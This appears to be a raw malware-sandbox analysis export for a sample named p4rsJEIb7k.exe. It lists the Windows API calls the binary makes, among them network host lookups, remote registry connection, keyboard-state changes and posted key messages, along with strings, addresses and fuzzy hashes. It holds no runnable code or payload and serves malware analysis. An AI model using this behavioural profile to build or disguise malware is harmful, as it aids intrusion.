                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: -----$SysListView32
                                                                                                                • API String ID: 2326795674-3975388722
                                                                                                                • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                                                                • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                                                                APIs
                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                                                                • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                                                                • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                                                                • WSACleanup.WSOCK32 ref: 004365FD
                                                                                                                • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                                                                • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Cleanup$Startupgethostbynamegethostnameinet_ntoa
                                                                                                                • String ID: 0.0.0.0
                                                                                                                • API String ID: 1500336939-3771769585
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                                                • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                                                • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                                                  • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                                                  • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc$IncrementInterlockedSleep
                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 3998264955-2843748187
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\p4rsJEIb7k.exe), ref: 0043719E
                                                                                                                • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                                                • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                                                Strings
                                                                                                                • C:\Users\user\Desktop\p4rsJEIb7k.exe, xrefs: 00437189
                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString$Message
                                                                                                                • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\p4rsJEIb7k.exe
                                                                                                                • API String ID: 4072794657-3785691661
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(?), ref: 0044157D
                                                                                                                • GetDC.USER32(00000000), ref: 00441585
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3864802216-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1927566239-0
                                                                                                                APIs
                                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 00417C51
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417C5E
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417C6B
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417C78
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417C85
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417CA1
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417CB1
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417CC7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: DecrementInterlocked
                                                                                                                • String ID:
                                                                                                                • API String ID: 3448037634-0
                                                                                                                APIs
                                                                                                                • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                                                • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                                                • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                                                • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                                                • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                                                • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                                                • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                                                • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 4116985748-0
                                                                                                                • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                                                • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConnectRegistry
                                                                                                                • String ID:
                                                                                                                • API String ID: 76216097-0
                                                                                                                • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                                                • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 3488606520-2761332787
                                                                                                                • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                                                • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                • String ID:
                                                                                                                • API String ID: 4082120231-0
                                                                                                                • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                                • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                • String ID:
                                                                                                                • API String ID: 4082120231-0
                                                                                                                • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                                                • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                                                • String ID:
                                                                                                                • API String ID: 288456094-0
                                                                                                                • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                                                • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                                                APIs
                                                                                                                • GetCPInfo.KERNEL32(00000000,?,00000000,00000001,00000000,?,?,?,0041D4AE,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00425458
                                                                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,?,?,0041D4AE,00000000,00000000,?), ref: 00425471
                                                                                                                • MultiByteToWideChar.KERNEL32(00000100,00000001,0041D4AE,00000000,00000000,00000000,?,?,?,0041D4AE,00000000,00000000,?,?,00000000,00000000), ref: 004254CF
                                                                                                                • MultiByteToWideChar.KERNEL32(00000100,00000001,0041D4AE,00000000,?,00000000,?,?,?,?,?,?,0041D4AE,00000000,00000000,?), ref: 0042551E
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,0041D4AE,00000000), ref: 00425539
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0041D4AE,00000000), ref: 0042555F
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0041D4AE,00000000), ref: 00425584
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 1775632426-0
                                                                                                                • Opcode ID: 691f6279820d20f455e7befef3e0fcba74c582925611e7755a6e8405b10c4f55
                                                                                                                • Instruction ID: cfbbdbeff2fc93c5700b589297128cc5131deecd4fa0efd2065aadc2599a9f50
                                                                                                                • Opcode Fuzzy Hash: 691f6279820d20f455e7befef3e0fcba74c582925611e7755a6e8405b10c4f55
                                                                                                                • Instruction Fuzzy Hash: F351A231E00628AFCF219F95EC44DEFBBB5EF88311F60011AF914A2250D3398D81CB68
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastselect
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 215497628-2761332787
                                                                                                                • Opcode ID: 8403caabb69194ab749b3558b6d17cf16ba223cf5fbe2e3d1d341ca8c1bfc534
                                                                                                                • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                                                • Opcode Fuzzy Hash: 8403caabb69194ab749b3558b6d17cf16ba223cf5fbe2e3d1d341ca8c1bfc534
                                                                                                                • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 004449B0
                                                                                                                • GetKeyboardState.USER32(?), ref: 004449C3
                                                                                                                • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                                                                • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00444BA9
                                                                                                                • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                                                                • SetKeyboardState.USER32(?), ref: 00444C08
                                                                                                                • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                                                                • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                                                                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                                                                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                                                • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                                                                • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: ConnectRegistry
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 76216097-2761332787
                                                                                                                • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                                                                • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Similarity
                                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2354583917-0
                                                                                                                • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                                • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
